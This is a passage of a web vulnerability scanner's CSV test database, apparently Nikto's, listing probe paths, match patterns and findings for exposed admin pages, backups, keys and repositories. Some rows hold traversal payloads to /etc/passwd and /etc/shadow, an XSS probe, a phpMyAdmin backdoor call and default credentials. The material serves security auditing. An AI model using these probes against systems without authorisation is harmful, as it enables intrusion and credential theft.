(diginsite.com) debug mode enabled.","","" "006501","","b","/servlet/snoopservlet","GET","Hit Count Demonstration","","","","","IBM Websphere SnoopDog example servlet found","","" "006502","","b","/servlet/hitcount","GET","Snoop Servlet - Request\/Client Information","","","","","IBM Websphere Hit Count example servlet found","","" "006503","","b","/keepalive.htm","GET","200","","Alive!","","","Weblogic heartbeat page found","","" "006504","","1b","/Admin/","GET","200","","Administration Homepage","","","Weblogic administration page found","","" "006505","","23","@AXIS2services/","GET","have\sreached\sthe\sAXIS\sHTTP\sServlet","","","","","Apache Axis web services found","","" "006506","","3","/web.config.bak","GET","<configuration>","","200","","","ASP config backup file is accessible.","","" "006507","","3","/web.config.back","GET","<configuration>","","200","","","ASP config backup file is accessible.","","" "006508","","3","/web.config.backup","GET","<configuration>","","200","","","ASP config backup file is accessible.","","" "006509","","3","/web.config.old","GET","<configuration>","","200","","","ASP config backup file is accessible.","","" "006510","","3","/web.config.orig","GET","<configuration>","","200","","","ASP config backup file is accessible.","","" "006511","","3","/web.config~","GET","<configuration>","","200","","","ASP config backup file is accessible.","","" "006512","","3","/.web.config.swp","GET","<configuration>","","200","","","ASP config backup file is accessible.","","" "006513","","1","/nn.asp","GET","File\sName","","200","","","Directory listing program found","","" "006514","","b3","/munin/index.html","GET","generated\sby\s.*munin","","200","","","Munin reveals system information.","","" "006515","","123","/includes/conexion.inc","GET","Provider=","DRIVER=","200","","","Database connection file found.","","" "006516","","3b","/errorpage.aspx","GET","DotNetNuke\sError:\s-\sVersion","","","","","DotNetNuke reveals the version number in the error page.","","" "006517","","b","/spin/main.csp","GET","200","iTechnology SPIN","","","","CA iTechnology SPIN interface found","","" "006518","","b","/openadmin/","GET","200","OpenAdmin Tool","","","","Informix OpenAdmin tool administration login","","" "006519","","b","@WORDPRESSwp-admin/wp-login.php?action=register","GET","Register\sFor\sThis\sSite","","","registration\sis\scurrently\snot","","Wordpress registration enabled","","" "006520","","b","@WORDPRESSwp-login.php?action=register","GET","Register\sFor\sThis\sSite","","","registration\sis\scurrently\snot","","Wordpress registration enabled","","" "006521","http://packetstormsecurity.org/files/109547/tibetsystem-traversal.txt","7","/../../windows/dvr2.ini","GET","\[generic\]","","","","","Tibetsystem DVR allows local file retrieval (LFI).","","" "006522","CVE-2005-1691","7","/htdocs/../../../../../../../../../../../etc/passwd","GET","root:","","","","","SAP Internet Graphics Server (IGS) directory traversal","","" "006523","CVE-2012-1823","38","/?-s","GET","\">\<\;\?php","<\?php","","","","PHP allows retrieval of the source code via the -s parameter, and may allow command execution.","","" "006524","CVE-2012-1823","38","/login.php?-s","GET","\">\<\;\?php","<\?php","","","","PHP allows retrieval of the source code via the -s parameter, and may allow command execution.","","" "006525","","b","@TOMCATADMINhtml","GET","<tt>conf\/tomcat-users\.xml<\/tt>","","","","","Default Tomcat Manager / Host Manager interface found","","" "006526","","b3","/getstatus","GET","License ID:","","","","","Chaos Software V-Ray status information available","","" "006527","","b","/platform/","GET","\.\.\/base\/index\.jsp","","","","","Platform Management Console found","","" "006528","http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us","123","/.svn/entries","GET","200","","","","","Subversion Entries file may contain directory listing information.","","" "006529","https://www.sans.org/blog/all-your-svn-are-belong-to-us/","123","/.svn/wc.db","GET","_autoindex","","","","","Subversion SQLite DB file may contain directory listing information.","","" "006530","","123","/.git/index","GET","200","","","","","Git Index file may contain directory listing information.","","" "006531","","123","/.hg/dirstate","GET","200","","","","","Mercurial DirState file may contain directory listing information.","","" "006532","","1","/test.jsp","GET","200","","","","","This might be interesting.","","" "006533","","1b","/em","GET","Oracle Enterprise Manager","","","","","Oracle Application Server oc4j admin page found.","","" "006554","","1b","/oam/","GET","Oracle Access Manager","","","","","Oracle Applications portal pages found.","","" "006555","CVE-2015-3035 https://websec.ca/publication/advisories/path-traversal-vulnerability-tplink-wdr740","7","/help/../../../../../../../../../../../../../../../../etc/shadow","GET","root:","","","","","TP-Link wireless routers directory traversal.","","" "006556","","3b","/snoop/","GET","Request Information","","","","","WebSphere snoop servlet information disclosure.","","" "006557","","3b","/web-console/ServerInfo.jsp","GET","Version Name","","","","","JBoss Application Server information available .","","" "006558","","3b","/otrs/installer.pl","GET","OTRS\sProject","","","","","OTRS installer application found","","" "006559","","3b","/reaction/RSTest.htm","GET","ReAction Server Test Page","","","","","ReAction Server test page is installed, this may reveal environmental information","","" "006597","","3b","/WorkArea/version.xml","GET","<installation>","","","","","Ektron CMS version information","","" "006598","","23","@WORDPRESSwp-content/debug.log","GET","PHP\sNotice","PHP\sWarn","","","","PHP debug log found","","" "006599","","23","/mobileadmin/db/MobileAdminDB.sqlite","GET","200","","","","","RoveIT Mobile Admin internal database is available for download","","" "006600","","b","/mobileadmin/","GET","SolarWinds\sWorldwide","","","","","RoveIT Mobile Admin internal database is available for download","","" "006601","http://seclists.org/fulldisclosure/2012/Sep/21","c","/WorkArea/upload.aspx","GET","EktronJQuery\.js","","","","","Ektron CMS file uploader.","","" "006602","http://seclists.org/fulldisclosure/2012/Sep/21","c","/WorkArea/Blogs/xmlrpc.aspx","GET","<error>1<\/error>","","","","","Ektron CMS may be vulnerable to XXE injection.","","" "006603","","1b","/mobileadmin/web/","GET","showLoadingScreen","","","","","RoveIT Mobile Admin Windows login","","" "006605","","1b","/mobileadmin/logs/","GET","Directory\sListing","","","","","RoveIT Mobile logs accessible","","" "006606","","1b","/mobileadmin/bin/","GET","Directory\sListing","","","","","RoveIT Mobile executable dir accessible","","" "006607","","3","/mobileadmin/home.cs","GET","Server\sVersion","","","","","RoveIT Mobile gives a list of a server's Windows domains","","" "006608","https://www.phpmyadmin.net/security/PMASA-2012-5/","8","@PHPMYADMINserver_sync.php?c=phpinfo()","GET","PHP\sVersion","","","","","phpMyAdmin contains a backdoor which allows remote PHP execution.","","" "006609","","23","/.git/HEAD","GET","ref:\srefs","","","","","Git HEAD file found. Full repo details may be present.","","" "006610","","23","/.bzr/branch-format","GET","Bazaar-NG\smeta","","","","","Bazaar file found. Full repo details may be present.","","" "006611","","23","/.hg/requires","GET","revlogv","","","","","Mercurial (HG) file found. Full repo details may be present.","","" "006612","","3","/troubleshooting_logs.txt","GET","dhcpd:","","","","","Arris Touchstone log file available without authentication.","","" "006613","","23","/caucho-status","GET","Caucho\sServlet\sEngine","","","","","Caucho Resin status file present","","" "006614","https://seclists.org/fulldisclosure/2012/Dec/242","23","@WORDPRESSwp-content/w3tc/dbcache/","GET","Index\s[oO]f\s/","","","","","W3 Total Cache reveals sensitive information.","","" "006615","","b","@WORDPRESSwp-content/plugins/portable-phpmyadmin/wp-pma-mod/","GET","<title>phpMyAdmin","","","","","phpMyAdmin (portable) found.","","" "006616","","23","@WORDPRESSwp-content/plugins/portable-phpmyadmin/wp-pma-mod/db_sql.php","GET","browse\">Browse","","","","","phpMyAdmin (portable) found which may allow DB access.","","" "006617","","23","@WORDPRESSwp-content/uploads/dump.sql","GET","WordPress\sMySQL\sdatabase","","","","","A Wordpress MySQL database dump was found.","","" "006618","","23","@WORDPRESSwp-content/plugins/pods/sql/dump.sql","GET","CREATE\sTABLE","INSERT\sINTO","","","","A Wordpress MySQL database dump was found.","","" "006619","","23","@WORDPRESSwp-content/plugins/simplemap/dump.sql","GET","CREATE\sTABLE","INSERT\sINTO","","","","A Wordpress MySQL database dump was found.","","" "006620","","23","@WORDPRESSwp-content/plugins/simplemap/classes/error_log","GET","PHP\sFatal\serror","","","","","Wordpress Simplemap error log found.","","" "006621","","23","@WORDPRESSwp-content/plugins/emailbuddy/db.sql","GET","CREATE\sTABLE","INSERT\sINTO","","","","A Wordpress MySQL database dump was found.","","" "006622","","2","@WORDPRESSwp-content/uploads/","GET","Index\s[oO]f\s","","","","","Wordpress uploads directory is browsable. This may reveal sensitive information","","" "006623","","23","@WORDPRESSwp-content/uploads/","GET","Index\s[oO]f\s","","temp_[a-z0-9]+","","","Wordpress uploads directory is browsable may contain database dumps in the 'temp_*' directory.","","" "006624","","23","@WORDPRESSwp-content/plugins/wpmu-dev-post-votes/db.sql","GET","CREATE\sTABLE","INSERT\sINTO","","","","A Wordpress MySQL database dump was found.","","" "006625","","23","@WORDPRESSwp-content/plugins/wpvotes/db.sql","GET","CREATE\sTABLE","INSERT\sINTO","","","","A Wordpress MySQL database dump was found.","","" "006626","","23","@WORDPRESSwp-content/plugins/post-voting/db.sql","GET","CREATE\sTABLE","INSERT\sINTO","","","","A Wordpress MySQL database dump was found.","","" "006627","CVE-2012-2922","3","/?q[]=x","GET","(trim|explode|preg_match|stristr)\(\)\sexpects\sparameter","Array\sto\sstring","","","","Drupal 7 contains a path information disclosure.","","" "006628","","3","/whoami.php","GET","php\sis\srunning\sas","","","","","Whoami.php reveals the web server user.","","" "006629","http://www.troyhunt.com/2012/01/aspnet-session-hijacking-with-google.html","23","/elmah.axd","GET","Error\sLog\sfor","Atif\sAziz","","","","elmah.axd reveals application log details.","","" "006630","","b","/SAFileUpDocs/whnjs.htm","GET","<title>SoftArtisans FileUp 5\.0<\/title>","","","","","SoftArtisans FileUp help documentation found.","","" "006631","","b","/SAFileUpSamples/","GET","FileUp v5 Code Sample Index","","","","","SoftArtisans FileUp samples found, these may allowed file uploads.","","" "006633","","3","/cgi-bin/status_cgi","GET","Touchstone\sStatus","","","","","Arris Touchstone status program reveals potentially sensitive information.","","" "006634","","2","/docs/","GET","Apache Tomcat","","<h2>Documentation Index</\h2>","","","Tomcat Documentation found","","" "006635","","013","/sites/all/libraries/tinymce/examples/","GET","example\susing\sjQuery","TinyMCE\sexamples","","","","Drupal install of TinyMCE examples found, check for file uploads.","","" "006636","","1","/notes.txt","GET","200","","","","","This might be interesting.","","" "006637","","1","/httpd.conf","GET","configuration\sfile","","200","","","Apache httpd.conf configuration file","","" "006638","","1","/httpd.conf.bak","GET","configuration\sfile","","200","","","Apache httpd.conf configuration file","","" "006639","","1","/sites/default/files/backup_migrate/","GET","index\sof","","","","","Drupal database backups available","","" "006640","","1","/sites/default/files/simpletest/verbose/ContentAccessModuleTestCase-2.html","GET","POST\srequest\sto","","","","","Drupal simpletest plugin has test cases available, may leak a username/password.","","" "006641","","b","/menu/neo","GET","Citrix\sLogin","","","","","Citrix Access Gateway login page detected.","","" "006642","","b","/eprise","GET","SilkRoad\sEprise","","","","","SilkRoad Eprise CMS login found.","","" "006643","","b","/eprise/local/systempages/login/","GET","Eprise:\sLogin","","","","","SilkRoad Eprise CMS login found.","","" "006644","","bd","/eprise/WebServices/","GET","Eprise\sWeb\sService","","","","","SilkRoad Eprise WebServices found.","","" "006645","","b","/documents/appserver/default.htm","GET","Application\sServer\sKnowledge\sBase","","","","","Agfa Impex Application Server KB found.","","" "006646","","b","/documents/default.htm","GET","IMPAX\sDocumentation","","","","","Agfa Impex Application Server documentation found.","","" "006647","","d","/AgfaHC.BackOffice.Web.Services/BackOfficeService.asmx","GET","BackOfficeWebService\sWeb\sService","","","","","Agfa Impex WebService","","" "006648","","b2","/eprsup/sitegenhelp/content/content.htm","GET","Content\sCenter","","","","","SilkRoad Eprise documentation.","","" "006649","","b2","/eprsup/eWebEditPro2/test.htm","GET","License\sKeys","","","","","SilkRoad Eprise has Ektron WebEditPro2 installed--test file found.","","" "006650","","b2","/eWebEditPro2/test.htm","GET","License\skeys","","","","","Ektron WebEditPro2 test/sample file found.","","" "006651","","b2","/ewebeditpro2/samples/asp/database/index.asp","GET","Ektron\sWebEditPro","","","","","Ektron WebEditPro2 test/sample file found.","","" "006652","","b2","/ewebeditpro2/samples/coldfusion/database/index.cfm","GET","Ektron\sWebEditPro","","","","","Ektron WebEditPro2 test/sample file found.","","" "006653","","b2","/ewebeditpro2/samples/jsp/database/index.jsp","GET","Ektron\sWebEditPro","","","","","Ektron WebEditPro2 test/sample file found.","","" "006654","","b2","/eprsup/ewebeditpro2/samples/asp/database/index.asp","GET","Ektron\sWebEditPro","","","","","Ektron WebEditPro2 test/sample file found.","","" "006655","","b2","/eprsup/ewebeditpro2/samples/coldfusion/database/index.cfm","GET","Ektron\sWebEditPro","","","","","Ektron WebEditPro2 test/sample file found.","","" "006656","","b2","/eprsup/ewebeditpro2/samples/jsp/database/index.jsp","GET","Ektron\sWebEditPro","","","","","Ektron WebEditPro2 test/sample file found.","","" "006657","","b2","/eprsup/ewebeditpro2/samples/php/database/index.php","GET","Ektron\sWebEditPro","","","","","Ektron WebEditPro2 test/sample file found.","","" "006658","","b2","/ewebeditpro2/samples/php/database/index.php","GET","Ektron\sWebEditPro","","","","","Ektron WebEditPro2 test/sample file found.","","" "006659","","2","/eprise/samples/samples2004/content/index.htm","GET","Samples\sCollection","","","","","SilkRoad Eprise CMS samples found. Functionality may include creating users or uploading files.","","" "006660","","2","/eprise/samples/QuickForms/PageFromStyle/CreatePageFromStyle","GET","Into\sthe\sFolder","","","","","SilkRoad Eprise CMS create page shows a list of directories on the web site (backend CMS paths).","","" "006661","","b1","/mychart/adminlogin.asp","GET","licensed\sfrom\sEpic","","","","","Epic Systems MyChart admin login found","","" "006662","","12","/exception.php","GET","200","","","","","PHP Exceptions File","","" "006663","","b","@MAGENTOinstall.php","GET","Magento\salready\sinstalled","","","","","Magento install.php file found.","","" "006664","","2b","@MAGENTOdownloader/","GET","Welcome\sto\sMagento","","","","","Magento installer found and installation is not complete.","","" "006665","","2b","@MAGENTOdownloader.php","GET","Welcome\sto\sMagento","","","","","Magento installer found and installation is not complete.","","" "006666","","b","@WORDPRESSwp-admin/wp-login.php","GET","Powered\sby\sWordPress","","","","","Wordpress login found","","" "006667","","b","/blog/wp-login.php","GET","Powered\sby\sWordPress","","","","","Wordpress login found","","" "006668","","b","@WORDPRESSwp-login.php","GET","Powered\sby\sWordPress","","","","","Wordpress login found","","" "006669","","2","/adfs/ls/?wa=wsignout1.0","GET","200","method=\"post\" action=\"/adfs/ls/?wa=wsignout1\.0\" id=\"aspnetForm\"","","","","Active Directory Federation Services sign out page found.","","" "006670","","2","/adfs/ls/?wa=wsignin1.0&wtrealm=http://www.cirt.net/","GET","200","method=\"post\" action=\"/adfs/ls/?wa=wsignin1\.0&wtrealm=http://www\.cirt\.net/\" id=\"aspnetForm\"","","","","Active Directory Federation Services sign in page found.","","" "006672","","b","@PHPMYADMINDocumentation.html","GET","phpMyAdmin .* Documentation","","200","","","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.","","" "006673","https://soroush.secproject.com/blog/2012/11/file-in-the-hole/","0","@FCKEDITOR_whatsnew.html","GET","Version\s2\.(?:6\.[0-8]|5\.\d+)<","","","","","FCKEditor versions below 2.6.9 allow file upload restriction bypasses.","","" "006674","","3","/apc.php","GET","APC\sINFO","APCu\sINFO","","","","APC/APCu Opcode Cache for PHP information script found","","" "006675","","b","@TOMCATADMINhtml","GET","401","","","","","Tomcat Manager / Host Manager interface found (pass protected)","","" "006676","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/proxytrustpolicystoretransfer","GET","200","","","","","Active Directory Federation Services page found.","","" "006677","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/fs/federationserverservice.asmx","GET","200","","","","","Active Directory Federation Services page found.","","" "006678","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/samlprotocol/proxytrust","GET","200","","","","","Active Directory Federation Services page found.","","" "006679","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/mexsoap","GET","200","","","","","Active Directory Federation Services page found.","","" "006680","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/proxymexhttpget/","GET","200","","","","","Active Directory Federation Services page found.","","" "006681","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/proxymex","GET","200","","","","","Active Directory Federation Services page found.","","" "006683","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/2005/windowstransport","GET","200","","","","","Active Directory Federation Services page found.","","" "006684","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/2005/certificatemixed","GET","200","","","","","Active Directory Federation Services page found.","","" "006685","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/2005/certificatetransport","GET","200","","","","","Active Directory Federation Services page found.","","" "006686","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/2005/usernamemixed","GET","200","","","","","Active Directory Federation Services page found.","","" "006687","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/2005/kerberosmixed","GET","200","","","","","Active Directory Federation Services page found.","","" "006688","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/2005/issuedtokenmixedasymmetricbasic256","GET","200","","","","","Active Directory Federation Services page found.","","" "006689","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/2005/issuedtokenmixedsymmetricbasic256","GET","200","","","","","Active Directory Federation Services page found.","","" "006690","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/13/kerberosmixed","GET","200","","","","","Active Directory Federation Services page found.","","" "006691","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/13/certificatemixed","GET","200","","","","","Active Directory Federation Services page found.","","" "006692","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/13/usernamemixed","GET","200","","","","","Active Directory Federation Services page found.","","" "006693","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/13/issuedtokenmixedasymmetricbasic256","GET","200","","","","","Active Directory Federation Services page found.","","" "006694","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/13/issuedtokenmixedsymmetricbasic256","GET","200","","","","","Active Directory Federation Services page found.","","" "006695","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trusttcp/windows","GET","200","","","","","Active Directory Federation Services page found.","","" "006696","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/proxytrust","GET","200","","","","","Active Directory Federation Services page found.","","" "006697","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/proxytrust13","GET","200","","","","","Active Directory Federation Services page found.","","" "006698","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/proxytrustprovisionusername","GET","200","","","","","Active Directory Federation Services page found.","","" "006699","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/services/trust/proxytrustprovisionissuedtoken","GET","200","","","","","Active Directory Federation Services page found.","","" "006700","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/FederationMetadata/2007-06/","GET","200","","","","","Active Directory Federation Services page found.","","" "006701","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/Federationmetadata/2007-06/FederationMetadata.xml","GET","200","","","","","Active Directory Federation Services page found.","","" "006702","https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview","2","/adfs/ls/IdpInitiatedSignon.aspx","GET","200","","","","","Active Directory Federation Services page found.","","" "006703","","1e","/console/","GET","200","","","","","Application console found","","" "006704","","1","/umbraco/login.aspx","GET","umbraco\.org","","","","","Umbraco admin login page found","","" "006705","","13","/aspmenu/_notes/dwsync.xml","GET","file\sname","","","","","Adobe Dreamweaver dwsync.xml Remote Information Disclosure","","" "006707","","be","@AXIS2axis2-admin/","GET","Axis2\sadministration\sconsole","","","","","Apache Axis2 administration console found.","","" "006709","","b6","/wsman/","GET","200","403","","","","Windows Remote Management is enabled","","" "006710","","be","/XMSPortal/","GET","XMS\sCustomer\sPortal","","","","","XMS Portal found","","" "006711","","27","/desktopmodules/feedbackdesigner/ajaxfbs/browser.html","GET","text\seditor","","","","","FCKEditor found","","" "006712","","20","/desktopmodules/feedbackdesigner/ajaxfbs/frmupload.html","GET","text\seditor","","","","","FCKEditor file uploader found","","" "006713","","13","/fantastico_fileslist.txt","GET","200","","","","","fantastico_fileslist.txt file found. This file contains a list of all the files from the current directory.","","" "006714","","d","/webservices/","GET","200","","","","","Webservices found","","" "006715","","be","/atg/bcc","GET","200","","","","","Oracle ATG Business Control Center","","" "006716","","be","/sqlJmsAdmin/","GET","SQL-JMS\sAdmin","","","","","Oracle ATG JMS SQL Admin","","" "006717","","e","/dyn/admin/","GET","200","","","","","Admin page found; possibly Oracle ATG","","" "006718","","e","/pls/apex","GET","Application\sExpress\sAdministration\sServices","","","","","Oracle APEX admin found","","" "006719","","e","/pls/apex_admin","GET","Application\sExpress\sAdministration\sServices","","","","","Oracle APEX admin found","","" "006720","","23","/_layouts/userdisp.aspx","GET","User\sinformation","","","","","Sharepoint discloses user information","","" "006721","","23","/_layouts/aclinv.aspx","GET","Add\sUsers","","","","","Sharepoint discloses user information","","" "006722","","23","/_layouts/associatedgroups.aspx","GET","Edit\sGroup","","","","","Sharepoint discloses user information","","" "006723","","23","/_layouts/groups.aspx","GET","People\sand\sGroups","","","","","Sharepoint discloses user information","","" "006724","","23","/_layouts/people.aspx","GET","People\sand\sGroups","","","","","Sharepoint discloses user information","","" "006726","","23","/_layouts/viewgrouppermissions.aspx","GET","The\squery\sstring","","","","","Sharepoint discloses user information","","" "006727","","23","/_vti_bin/spdisco.aspx","GET","<discovery\s","","","","","Sharepoint discloses WSDL information via this XML","","" "006728","","e","/crx","GET","200","","","","","Adobe CQ CRX Console","","" "006729","","e","/system/console/configMgr","GET","200","","","","","OSGi Apache Felix console","","" "006730","","e","/system/console/bundles","GET","200","","","","","OSGi Apache Felix console","","" "006731","","e","/system/console","GET","200","","","","","OSGi Apache Felix console","","" "006732","","0","/repository/","GET","200","","","","","CRX WebDAV upload","","" "006734","","0","/cqresource/","GET","200","","","","","CRX WebDAV upload","","" "006735","","3","/etc/cloudservices","GET","200","","","","","Adobe Experience Manager Cloud Service Information","","" "006736","","3","/etc/reports","GET","200","","","","","Adobe Experience Manager Reports","","" "006737","https://seclists.org/fulldisclosure/2014/Feb/171","7","@WORDPRESSwp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php","POST","etc","windows","200","","","NextGEN Gallery LFI.","dir=/","" "006738","","8b","@CGIDIRSc99.php","GET","200","","r57 c99 shell","","","c99.php remote web shell","","" "006739","","8b","/c99.php","GET","200","","r57 c99 shell","","","c99.php remote web shell","","" "006740","","3","/dumpinfo","GET","200","Service\sLocator\sURL\sMappings","","","","National Instruments Service Locator","","" "006741","","3","/somenonexistingfile.epl","GET","404: somenonexistingfile\.epl\(1\): Not found '/.*/somenonexistingfile\.epl'","","","","","Embperl 404 message discloses full file path","","" "006742","","1","/umbraco/ping.aspx","GET","I'm alive!","","","","","Umbraco ping page found","","" "006743","","3","/Trace.axd","GET","Request\sDetails","Application\sTrace","","","","Trace.axd can reveal application or system details","","" "006744","","a","/SDE/timeout.aspx","GET","bmclabelbold","","","","","BMC Service Desk Express found","","" "006745","","e","/manage/CxSense/","GET","200","","SmartCipher","","","Covertix SmartCipher Console Login detected. Default credentials are: admin:Admin","","" "006746","","3","/manage/Logs/","GET","200","","","","","Covertix SmartCipher Console Login and Web Service Log directory detected","","" "006747","","d","/manage/CxSenseWebService/CxSense.asmx","GET","200","","CxSense\sWeb\sService","","","Covertix SmartCipher Web Service detected","","" "006748","","d","/ws/CxInternetDMZ.asmx","GET","200","","CxServerDMZ","","","Covertix SmartCipher DMZ Server Web Service detected","","" "006749","CVE-2009-0932","7","/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00","GET","root:","","","","","Horde local file retrieval (LFI) found.","","" "006750","https://owncloud.org/security/advisories/","b","@OWNCLOUDstatus.php","GET","\{\"installed\":\"true\",\"(version|maintenance)\":\"","","200","","","ownCloud/Nextcloud installation identified by status.php--see the program for the running version","","" "006751","","0","@OWNCLOUDremote.php/webdav","GET","Generated\sby\sSabreDAV","Sabre_DAV_Exception_NotAuthenticated","","","","ownCloud WebDAV file upload detected (pass protected), remote.php/caldav and remote.php/carddav are also valid","","" "006752","","1235","@OWNCLOUD@OCFILES","GET","(\"app\":\"|\"reqId\":\"|This is used for testing whether htaccess|SQLite format)","","200","","","Unprotected ownCloud data directory identified","","" "006754","https://cirt.net/passwords?criteria=Seclore","b","@SECLOREWelcome.do","GET","200","","Powered\sBy\sFileSecure","","","Seclore FileSecure installation detected. Default credentials are: root:changeonfirstlogin and sa:changeonfirstlogin.","","" "006755","","e","/eyekit/eyekit.php","GET","200","","eyekit\sRelease","","","eyeKit CMS admin login detected","","" "006756","","12","/rsa","GET","200","","","","","Encryption key exposed","","" "006757","","12","/rsa.old","GET","200","","","","","Encryption key exposed","","" "006758","","12","/dsa","GET","200","","","","","Encryption key exposed","","" "006759","","12","/dsa.old","GET","200","","","","","Encryption key exposed","","" "006760","","12","/id_rsa","GET","200","","","","","Encryption key exposed","","" "006761","","12","/id_rsa.old","GET","200","","","","","Encryption key exposed","","" "006762","","12","/id_dsa","GET","200","","","","","Encryption key exposed","","" "006763","","12","/id_dsa.old","GET","200","","","","","Encryption key exposed","","" "006764","","12","/identity","GET","200","","","","","Encryption key exposed","","" "006765","","12","/key","GET","200","","","","","Encryption key exposed","","" "006766","","12","/key.priv","GET","200","","","","","Encryption key exposed","","" "006767","","2be","/App_Config/sitecore/debug/Trace.xslt","GET","Elapsed\ssince","","","","","Sitecore CMS admin/restricted pages available","","" "006768","","2be","/App_Config/sitecore/debug/Profile.xslt","GET","Most\sItems\sRead","","","","","Sitecore CMS admin/restricted pages available","","" "006769","","2be","/App_Config/sitecore/shell/sitecore.version.xml","GET","<major>","","","","","Sitecore CMS admin/restricted pages available","","" "006770","","2be","/App_Config/sitecore/admin/cache.aspx","GET","<title>Cache\sAdmin","","","","","Sitecore CMS admin/restricted pages available","","" "006771","","2be","/App_Config/sitecore/admin/stats.aspx","GET","<title>Statistics","","","","","Sitecore CMS admin/restricted pages available","","" "006772","","2be","/App_Config/ConnectionStrings.config","GET","Sitecore\sconnection","","","","","Sitecore CMS admin/restricted pages available","","" "006773","","2be","/web.config.Net3_5.MVC","GET","name=\"sitecore","","","","","Sitecore CMS admin/restricted pages available (this is likely a default web.config)","","" "006774","","2be","/web.config.Net4.MVC","GET","name=\"sitecore","","","","","Sitecore CMS admin/restricted pages available (this is likely a default web.config)","","" "006775","","2be","/sitecore_data/webdav.lic","GET","IT\sHit\sWebDAV","","","","","Sitecore CMS license","","" "006776","","2be","/sitecore%20modules/Shell/IndexViewer/MainForm.aspx","GET","Welcome\sto\sthe\sIndexViewer","","","","","Sitecore CMS admin/restricted pages available","","" "006777","","2be","/sitecore/data/logs/nvelocity.log","GET","SimpleLog4NetLogSystem","","","","","Sitecore CMS admin/restricted pages available","","" "006778","","2be","/sitecore/debug/Profile.xslt","GET","Data\sCache","cachemiss","","","","Sitecore CMS admin/restricted pages available","","" "006779","","2be","/sitecore/login/default.aspx","GET","LoginPanelOuter","","","","","Sitecore CMS admin login","","" "006780","","2be","/sitecore/shell/WebService/Service.asmx","GET","operations\sare\ssupported","","","","","Sitecore CMS webservice found","","" "006781","","2be","/?sc_mode=edit","GET","302","","sitecore","","","Sitecore CMS is installed. This url redirects to the login page.","","" "006782","","2be","/sitecore/admin/stats.aspx","GET","Renderings","","","","","Sitecore CMS admin/restricted pages available","","" "006783","","2be","/wcadmin/login.aspx","GET","QS\/1","","","","","QS/1 Webconnect administration panel","","" "006784","https://seclists.org/fulldisclosure/2011/Jul/353","4","/sitecore/login?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=","GET","src=\"http:\/\/www\.example\.com","","","","","Sitecore CMS contains an arbitrary redirect vulnerability.","","" "006785","CVE-2014-100004","4","/?xmlcontrol=body%20onload=alert(123)","GET","<body\sONLOAD=ALERT\s123","","","","","Sitecore CMS vulnerable to Cross-Site Scripting","","" "006786","","be","/crystal/enterprise10/admin/en/admin.cwr","GET","Crystal\sManagement\sConsole","","","","","Crystal Enterprise Management Console found","","" "006787","","1","/encrypt.aspx","GET","200","","","","","This might be interesting.","","" "006788","","1","/decrypt.aspx","GET","200","","","","","This might be interesting.","","" "006789","","1","/encrypt.php","GET","200","","","","","This might be interesting.","","" "006790","","1","/decrypt.php","GET","200","","","","","This might be interesting.","","" "006791","","1","/encrypt.asp","GET","200","","","","","This might be interesting.","","" "006792","","1","/decrypt.asp","GET","200","","","","","This might be interesting.","","" "006793","","1","/encrypt.jsp","GET","200","","","","","This might be interesting.","","" "006794","","1","/decrypt.jsp","GET","200","","","","","This might be interesting.","","" "006795","","1","/encrypt","GET","200","","","","","This might be interesting.","","" "006796","","1","/decrypt","GET","200","","","","","This might be interesting.","","" "006797","","0","@FCKEDITOReditor/filemanager/browser/default/frmcreatefolder.html","GET","Create New Folder","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006798","","0","@FCKEDITOReditor/filemanager/connectors/test.html","GET","FCKeditor\s-\sConnectors Tests","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006799","","0","@FCKEDITOReditor/filemanager/connectors/uploadtest.html","GET","FCKeditor\s-\sUploaders Tests","","","","","FCKeditor could allow files to be updated or 